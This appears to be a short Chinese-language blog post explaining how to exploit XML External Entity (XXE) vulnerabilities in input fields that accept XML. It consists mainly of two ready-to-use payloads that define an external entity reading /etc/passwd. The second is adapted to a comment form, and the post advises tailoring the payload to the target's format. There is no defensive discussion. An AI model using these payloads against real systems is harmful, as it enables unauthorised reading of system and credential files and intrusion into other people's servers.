XXE漏洞的利用

发布时间 2023-03-22 21:16:32作者: 野荷
对于XXE漏洞的利用

 

在有些可以运行xml的对话框中,可以利用XXE漏洞,来查看一些文件

这是原文

这是将passwd暴露出来的例子
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
  <!ELEMENT foo ANY >
  <!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<foo>&xxe;</foo>
原文中有更多的使用例子

但值得注意的是原文的例子不能直接拿来用,得根据对话框的格式来进行相关的修改

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
  <!ELEMENT foo ANY >
  <!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<comment> <name>Joe Hamd</name> <author>Barry Clad</author> <com>&xxe;</com> </comment>
comment的内容就是的随机应变的内容